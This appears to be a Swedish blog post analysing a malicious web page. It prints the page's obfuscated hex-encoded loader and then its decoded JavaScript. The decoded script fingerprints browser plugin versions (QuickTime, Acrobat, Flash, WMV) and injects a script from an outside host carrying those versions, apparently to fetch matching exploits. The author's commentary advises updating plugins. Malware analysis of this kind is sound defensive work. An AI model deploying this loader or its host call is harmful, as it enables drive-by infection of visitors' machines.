b3d3bc0533c4e4CBF413c50503b4eaca8545aAF90748D9b7a969D63676f6573625a5863B6887873748086AF665382637254586966967B937696A57ca752668062645B63c13F4F4C4B3D94B5AB93B07E4f3E3B4cc33f4F4cBF413CC06695a6B7A59C5Aa86F52C063bf413c5050A6b7BC62af3f4d4f9BAB636aa293B9af99A6B7b1a660B0af9faa97bba497B6A154BBaca699a172be5Fb2B66FAB9fB9688F73A8B09594afAB9695AFb79b9bb16F3F4f4C4ba2879A98849c748d546F636d62766A7d413CC06695a6B7a59C5AA86f52C063bf413c5050a9ADACae995ab39c6575758e889e71B297B3aab69c527f666a6E504c3Da2997962778f96A052806659756a625f52B39C6575758E889E7E533C524D4f3Ea8a4b852b4afBAae75b5789e65806298a1A6bb9faaB1B66295b5AB93b9A887a097B0ABA0B96b64a795B5AFA2b9656B6f3F4db59EBDBD85a664af74a5aab783A8A6B5AF94baB7A75C54b7bfa2AA656e5454B7abAAb972AC95a8A4b995B7acB2a8546c813f4FB2AEACAC86B864B171B599A684BAA6B7aca4A9A6a86E54B8b5a5565E63689ab9b7b26e6172A796BBa4a4a2a471a9A1b272a59B9b70a89BB372aba296A8BE60A8AAab736b73766a7C78a86D627a7a987574746462737d69aa73A798677b766475737264627376627575A66C677c7F677bA4a89a627368527063b28a6573787e99AF625F52b19B89979599657D637152b18d847c8A7bA89D656E629868937a94B87CA35d6D50503f4FA7b197a7b0aba0b971A4A396bc7493B5B3A7A29686AE9Bb1a76Aa39eBBc075b775ae5D6D5050AF524d')">

//-->
</script>
</head>
<body onload="gN73Os7rj('50509BAB636A5596B2a9a7b2a8b0a8608cBE8a9293a17E966c66ad524d4f3ea8a4B852B5997564648f9A9E4e80625b626A813F4Fb9a3A652af90748D9b7A969d4c83526c73725B6D5050A8a6B5629868937a94b87cA33D6f636d62756A7D413Cb9a7A465B1978b84959D63904C7F545973765980504C413cB7B8AB65be4f3e3Ba9b5a4656bB895A463bb67998d7984829D836280B877887c7a96829F7Fb095a8acad93b9B2b462a2afbb99aeb1b5629Ea8B499B9ab7dA96797906995939C5F5D6c66AD524D4B3Da8A4B852AFB59b7B78BD7F74658062a293b9AF99A6B7b1a660b3b2a7ACACb0A78dB87b868f7a92848ca074A0A6b0A76F3F4D4f3b524d4B3D9bA9665ab5997564648F9a9e65807F5462636C5865ADb48d7989c06b8771ABA296a8BE81ab6b6485a7ACA99d99acaf99546C665382636f655B63c13f4f4C4B3da8a4B85287bca68e9688b1a8658062A493b5B9978eB1B65C9CB59F798Bbd7b7660B5ABA2B1A4A5995A72A27674aa6e5b596C6F6d524d4f3E3B4C4F9bab636A76aba7A0968aAEB8547063765B65be4f3E3B4C4F3BB5997564648F9A9E65806276ABA7A0968aAEb862A6b299a6b7acB09B5A747c5b804c4B3D3b50503b4e4CBF413c4c4faf524d4F3E3b4cAF98656bAE7e748B9e6aa7AE62716F636d62756A625A5863b0A49e8A88AE6B85749bB3A7a7ac81a96e5486a7b19697638795b7B2a495A6656f5266806261636c66AD524D4B3D3Badb88B8c89BC6D74638352B3a4b89d99a4baA1B771b2A0a7AAafA0b89eB769868D7D82959d9F6296A8B995B7ACB2A89bB2B46D524D4f3e3B4c4F9Bab636A9eA49C8d78BF7c84629BB1AA97bd92a85c54637B546E6363715270775b65BE4F3e3b4C4F3BB18D847C8a7Ba89d6580625b62786d6D524D4B3d3Bc06697B1B6A7549Ba9665aAFB59B7B78BD7f7473ACB09897BB95986d65626A546c665382636F655B63C13f4F4c4b3D3baf90748D9B7a969D6383526C73785B6D50503B4e4CBF5497afb99765aca8545aADB88B8c89BC6D7471AFA0A9a8ba83986b68527C656b545380665f766c62af3F4d4F3B4E4cAE7E748b9e6Aa7AE6271526A76696c7e4f3E3b4c4faf65A8aeA79763c13F4f4C4B3d3BAF90748d9b7A969D6383526c73735B6d50503b4e4cBF413C4C4fAF524D4F3e3b4caf98656Ba66a8277a8a57eA462716f636d62756A625a5863B0A49e8A88ae6B85749bB3a7A7AC81A96E5498abb1979dbaa7A8AA6388A093b6AE546E6363715270775b65be4F3e3B4c4fA8a6b562A9ab79b4667D9A8D546F636d5980504c3d3b4Cb0a49e8a88AE6b85666F65b1a3aa9baaa7a6B4B570a49Eb8AD9bb3B69da96797906995939c9160A7abA5a8b5ABa4a6ACb5A080504C413C4C4F3BabB2B45Ca8A4b852BFB677aaa590BC77658062646d63c0a57ab9b581A888666E65ADB48D7989C06B8771AE99a0aaBA9a8063BCA767b9B97fbb886D5F5B63c13f4f4C4B3d3Bb9a7A4658C849d7b8bad8A97637f549CB59f798BBD7b7660A6ae93b784B65CACB67BA8b890B8795B7E533c524D4b3d3B4CAF98656b639DA591A7806Db3A3a6A5a88Fa0B96b8b769B8c8E999D956b5d52BFc2526D8c849d7b8Bad8A97637f71526A745965696854a7bc7CA0797B997f60afABa0ACB7AA547063765B6e63bd413c4c4F3b4e4Cb7ad68B17A6A9C8E625f6f638f74AE8C8a9b8a95813f4f4C4B3D3BC06697b1B6A7549BA9665abaBC78a2667b9D7D73afA7a299b7AE528363725D52be533C4e4c4B3D3Ba5B897A6AE7d413C4c4F3B4ec04f3E3B4C4FAF524d4f3E3B4C4fA8a6B5627E75B7A0ac797ba8546f63BBab7BB1766c898E74A5B5afaba85A6A74596e7E4F3e3f4d4f3b4eaca8545A8D89A69fbd766c989E768f657f626d5B63c13F4f4C4B3d3Ba77C8279A5b56d936383526C7aa55b6D50503b4E4CBF5497AFb99765ACa8545A8D89a69fbd766c989E768f65807f546b636C58658d85a88Cbd7a6AAB9e7391528083527563685A528D89A69fBD766c989e788f657F62656378665B65be4f3e3B4C4F3Ba979926894b67F936580625b69766d6d524d4b3d3bc0533c4e4CBF413c50503b4eaca8545aAF90748D9b7a969D63676f6573625a5863B6887873748086AF665382637254586966967B937696A57ca752668062645B63c13F4F4C4B3D94B5AB93B07E4f3E3B4cc33f4F4cBF413CC06695a6B7A59C5Aa86F52C063bf413c5050A6b7BC62af3f4d4f9BAB636aa293B9af99A6B7b1a660B0af9faa97bba497B6A154BBaca699a172be5Fb2B66FAB9fB9688F73A8B09594afAB9695AFb79b9bb16F3F4f4C4ba2879A98849c748d546F636d62766A7d413CC06695a6B7a59C5AA86f52C063bf413c5050a9ADACae995ab39c6575758e889e71B297B3aab69c527f666a6E504c3Da2997962778f96A052806659756a625f52B39C6575758E889E7E533C524D4f3Ea8a4b852b4afBAae75b5789e65806298a1A6bb9faaB1B66295b5AB93b9A887a097B0ABA0B96b64a795B5AFA2b9656B6f3F4db59EBDBD85a664af74a5aab783A8A6B5AF94baB7A75C54b7bfa2AA656e5454B7abAAb972AC95a8A4b995B7acB2a8546c813f4FB2AEACAC86B864B171B599A684BAA6B7aca4A9A6a86E54B8b5a5565E63689ab9b7b26e6172A796BBa4a4a2a471a9A1b272a59B9b70a89BB372aba296A8BE60A8AAab736b73766a7C78a86D627a7a987574746462737d69aa73A798677b766475737264627376627575A66C677c7F677bA4a89a627368527063b28a6573787e99AF625F52b19B89979599657D637152b18d847c8A7bA89D656E629868937a94B87CA35d6D50503f4FA7b197a7b0aba0b971A4A396bc7493B5B3A7A29686AE9Bb1a76Aa39eBBc075b775ae5D6D5050AF524d')">
</body>
</html>


Nedan följer det som genereras av dessa 2 obfuscated steg.
Scriptet i sig som synes söker igenom tillgängliga plugins för din browser (quicktime, acrobat, flash) och tyvärr är detta så långt som jag kommer, urlen som serveras i slutet returnerar hittils efter mina försök endast en fake-500 sida vilket den verkar göra så länge den inte får de variablar den är ute efter, så vitt jag/vi på kontoret kan se så verkar siten i sig servera färdiga exploits för de plugins som den hittar möjliga hål i. för att undvika att detta händer kan jag inte föreslå annat än att se till att uppgradera de plugins man använder, om någon annan kommer vidare med detta får ni gärna höra av er till mig.

(Koden är åter igen html-safe och utan text-indent)


if (!document.IxXMP_Jd) {
var pV302LTl = '0';
var lJBHX8bk = '00';
var d6P4bs9a = '00';
var nUWRRW1K = '00';
try {
for (var u5TJ7PPZ=0;u5TJ7PPZ <navigator.plugins.length;u5TJ7PPZ++)
{
var jrYGFz9B = navigator.plugins[u5TJ7PPZ].name;
if (pV302LTl == 0 && jrYGFz9B.indexOf("QuickTime") != -1) {
var BydZdEkv = parseInt(jrYGFz9B.replace(/\D/g,''));
if (BydZdEkv > 0) {
pV302LTl = BydZdEkv.toString(16);
}
}
if (lJBHX8bk == '00' && jrYGFz9B.indexOf("Adobe Acrobat") != -1) {
jrYGFz9B = navigator.plugins[u5TJ7PPZ].description;
if (jrYGFz9B.indexOf(" 5") != -1) {
lJBHX8bk = '05';
} else if (jrYGFz9B.indexOf(" 6") != -1) {
lJBHX8bk = '06';
} else if (jrYGFz9B.indexOf(" 7") != -1) {
lJBHX8bk = '07';
} else {
lJBHX8bk = '01';
}
}
if (d6P4bs9a == '00' && jrYGFz9B.indexOf("Shockwave Flash") != -1) {
var uy6n48WK = '';
jrYGFz9B = navigator.plugins[u5TJ7PPZ].description;
for(var zs5vsMvE = 0; zs5vsMvE < jrYGFz9B.length; zs5vsMvE++) {
var IBiIHgXR = jrYGFz9B.charAt(zs5vsMvE);
if (!isNaN(parseInt(IBiIHgXR)) || (IBiIHgXR == '.' && uy6n48WK.length > 0)) {
uy6n48WK += IBiIHgXR;
} else if (uy6n48WK.length > 0) {
break;
}

}
var JCtZz48f = uy6n48WK.split('.');
if (JCtZz48f[0] < 9) {
d6P4bs9a = '7c';
} else if (JCtZz48f[0] == 9 && JCtZz48f[1] == 0 && JCtZz48f[2] < 115 ) {
d6P4bs9a = '73';
}

}
if (lJBHX8bk != 0 && pV302LTl != 0 && d6P4bs9a != 0) {
break;
}
}
}
catch(e) { }
try {
if (navigator.mimeTypes["video/x-ms-wmv"].enabledPlugin) nUWRRW1K = '01';
}
catch(e) { }
while(pV302LTl.length < 8) pV302LTl = '0' + pV302LTl;
var olxzCr2l = document.createElement("script");
olxzCr2l.setAttribute("type", "text/javascript");
olxzCr2l.setAttribute("src", "http://advabnr.com/cgi-bin/index.cgi?900875f9074f01200077e0ed58020000000002d859956aff00" + pV302LTl + nUWRRW1K + lJBHX8bk + d6P4bs9a);
document.body.appendChild(olxzCr2l);
}




/Dari
Upplagd av kl.

Inga kommentarer:

Skicka en kommentar

Prenumerera på: Kommentarer till inlägget (Atom)